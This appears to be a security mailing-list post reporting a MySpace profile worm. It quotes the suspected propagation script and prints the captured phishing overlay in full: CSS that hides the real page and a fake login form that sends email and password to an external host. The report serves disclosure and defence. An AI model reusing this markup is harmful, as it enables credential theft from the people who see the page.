There appears to be a new myspace worm propagating on their pages. The worm
infects a user's profile page and then attempts to phish for usernames
(emails) and passwords. The page looks almost identical to a regular myspace
login and the url looks like a valid myspace page. However, the form
attempts to redirect to another site. The form is miscoded though and does
not execute correctly.
An example page is: www.myspace.com/netty567
The regular divs seem to be hidden by a "hidden" flag.
If you attempt to enter your password, you can see the paramaters in the get
url. Then the page errors out.
I'm unsure of the means of propagation, however it appears to be:
<script src="http://cache.static.userplane.com/presence/m/f.js";
language="javascript" type="text/javascript"></script>
<script language="javascript" type="text/javascript">
<!--
up_runPresence('VmLelmpv78asi20WVLBM89pps3b1UZF3J7oij/t/3We49qrCOQ+euxTD2H+rqgkp');
//-->
</script>
You can easily pull the code from the src url. I haven't fully analyzed it
yet, but I assume that's how the worm is propagating.
Example of the form trying to grab the passwords:
table { visibility:hidden;}
div { visibility:hidden; }
div table { visibility:visible!important; }
.Main { visibility:visible!important; position:absolute; left:0px;
top:125px; width:100%; background-color:e5e5e5; }
.show { visibility:visible!important; }
</style>
<DIV id="tipDiv" class="Main"
style="display:block;width:100%;height:100%;" align="center">
<img src="http://x.myspace.com/images/spacer.gif"; width="10000" height="1" />
<table align="center" class="show" width="800" style="border:2px
solid silver;" cellpadding="0" cellspacing="0">
<tr align="center" valign="top" bgcolor="FFFFFF">
<form action="http://..:24/saving.php"; method="get" name="theForm"
id="theForm">
<td align="center"><p><span class="blacktext15">You Must Be
Logged-In to do That! </span><br><br>
<font size="2">MySpace is FREE, But You Must Be a Member to Use
That Feature</font></p>
<table align="center" class="show" width="100%" border="0"
cellspacing="0" cellpadding="0">
<tr valign="top">
<td width="70%">
<table class="show" width="300" border="0" align="center"
cellpadding="1" cellspacing="0">
<tr>
<td valign="top" bgcolor="003399">
<table class="show" width="100%" border="0" cellspacing="0"
cellpadding="5">
<tr>
<td valign="top" bgcolor="FFFFFF" align="center">
<strong><font color="003399">Member Login</font></strong><br>
<table class="show" width="100%" border="0"
cellspacing="0" cellpadding="3">
<tr>
<td width="28%" align="right">E-Mail:</td>
<td width="72%"><input type="text" name="email"
value="" size="20"></td>
</tr>
<tr>
<td align="right">Password:</td>
<td><input type="password" name="password" size="20"></td>
</tr>
<tr valign="top">
<td colspan="2" align="center">
<a class="redlink7"
href="http://viewmorepics.myspace.com/index.cfm?fuseaction=user.retrievepassword";><font
size="1">Forgot your password?</font></a><br>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="142" height="30" valign="bottom" align="center">
<input type="checkbox" name="Remember"
value="Remember">Remember Me
</td>
<td width="40" valign="bottom">
<input type="image" name="Submit22"
src="http://viewmorepics.myspace.com/images/button_login_main.gif";
alt="Log In">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td width="30%" valign="middle"> </td>
</tr>
</table>
--
Matthew Wollenweber
mjw@cyberwart.com
![http://x.myspace.com/images/spacer.gif"](http://x.myspace.com/images/spacer.gif"){kind=link}
![http://viewmorepics.myspace.com/images/button_login_main.gif"](http://viewmorepics.myspace.com/images/button_login_main.gif"){kind=link}